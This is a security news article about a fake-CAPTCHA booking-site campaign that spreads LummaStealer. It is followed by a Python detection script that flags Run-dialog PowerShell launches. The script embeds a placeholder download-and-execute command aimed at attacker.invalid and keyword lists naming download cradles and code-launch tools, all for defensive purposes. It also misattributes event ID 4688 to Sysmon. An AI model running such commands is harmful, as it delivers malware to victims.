Cybercriminals have launched a new sophisticated attack campaign targeting travelers through fake booking websites. The campaign, discovered in early 2025, tricks users into installing LummaStealer malware through a deceptive CAPTCHA verification process, putting personal and financial information at risk. G Data analysts identified that the attack initially targeted travelers booking trips to Palawan, Philippines, but later shifted to hotel bookings in Munich, Germany, indicating a global campaign.

The entire infection chain consists of four distinct stages that ultimately lead to the installation of LummaStealer, an information-stealing malware operating under a Malware-as-a-Service model. Before viewing their booking details, users encounter a CAPTCHA verification that requires them to click an "I'm not a robot" checkbox. Unlike legitimate CAPTCHA systems, this fraudulent verification instructs users to open the Windows Run dialog and paste a pre-copied command. When users follow the deceptive instructions, they unknowingly execute a PowerShell command that initiates the infection chain. The command runs a Base64-encoded script that downloads the LummaStealer payload from the attacker's server and executes it on the victim's system, bypassing traditional security measures because the user initiated the execution.

The payload's increased file size serves as an evasion technique known as Binary Padding, where malware authors add junk data to extend the file size and potentially avoid detection by security tools. The malware also employs an obfuscation technique called Indirect Control Flow, which uses Dispatcher Blocks to calculate target addresses dynamically at runtime rather than using direct jumps or calls, making analysis significantly more difficult.

Security researchers expect LummaStealer attacks to continue increasing in the coming months as attackers refine their social engineering techniques to exploit travelers seeking online booking services.
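The infection step described above (a PowerShell command pasted into the Run dialog that carries a Base64-encoded download-and-execute script) leaves a recognisable process-creation trail: powershell.exe spawned by explorer.exe with an -EncodedCommand argument. The following detection logic is an added example written for this article; it is not code from the article or from G Data. The log events, the placeholder script and the `.invalid` URL are constructed here for illustration, and the keyword lists are assumptions about what a download cradle typically contains. The decoder shows why defenders should decode the UTF-16LE Base64 payload rather than match on the encoded blob itself.

```python
import base64
import re

# --- Constructed sample events (parent image, image, command line) -----------
# The encoded command is built from an inert placeholder script at import time
# so the sample contains no real payload or live URL.
def _encode_ps(script: str) -> str:
    # PowerShell's -EncodedCommand expects Base64 over the UTF-16LE script text.
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

PLACEHOLDER_SCRIPT = (
    "$r = Invoke-WebRequest -Uri 'https://attacker.invalid/payload.bin'; "
    "Start-Process 'C:\\Users\\Public\\payload.bin'"
)

SAMPLE_EVENTS = [
    # Run-dialog paste: explorer.exe launches powershell with a hidden window
    ("explorer.exe", "powershell.exe",
     "powershell.exe -w hidden -ep bypass -enc " + _encode_ps(PLACEHOLDER_SCRIPT)),
    # Benign scheduled maintenance script
    ("cmd.exe", "powershell.exe",
     "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"),
    # Unrelated user activity
    ("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\Public\\notes.txt"),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc...).
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
HIDDEN_WINDOW = re.compile(r"(?i)-(?:w|win|window|windowstyle)\s+hidden")
# Assumed indicator lists: common download cradles and code-launch primitives.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b")
EXECUTION = re.compile(
    r"(?i)start-process|invoke-expression|\biex\b|rundll32|regsvr32|mshta")


def decode_encoded_command(cmdline: str):
    """Return the decoded script carried by -EncodedCommand, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_event(parent: str, image: str, cmdline: str) -> list:
    """Collect human-readable findings for one process-creation event."""
    findings = []
    if image.lower() not in ("powershell.exe", "pwsh.exe"):
        return findings
    if parent.lower() == "explorer.exe":
        findings.append("powershell spawned by explorer.exe (consistent with a Run-dialog paste)")
    if HIDDEN_WINDOW.search(cmdline):
        findings.append("hidden window requested")
    script = decode_encoded_command(cmdline)
    if script is not None:
        findings.append("encoded command present")
        if DOWNLOAD_CRADLE.search(script):
            findings.append("decoded script contains a download cradle")
        if EXECUTION.search(script):
            findings.append("decoded script launches a process or evaluates code")
    return findings


def triage(events) -> list:
    """Return one findings list per event, in input order."""
    return [assess_event(parent, image, cmd) for parent, image, cmd in events]


if __name__ == "__main__":
    for (parent, image, cmd), findings in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{parent} -> {image}: {len(findings)} finding(s)")
        for f in findings:
            print("   -", f)
```

In a real deployment the event source would be Sysmon Event ID 4688 or an EDR process-creation feed; the combination of an explorer.exe parent, a hidden window and a decoded download cradle is what separates the Run-dialog lure from ordinary administrative PowerShell, which is why the second sample event produces no findings.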
This Cyber News was published on cybersecuritynews.com. Publication date: Wed, 19 Mar 2025 10:55:20 +0000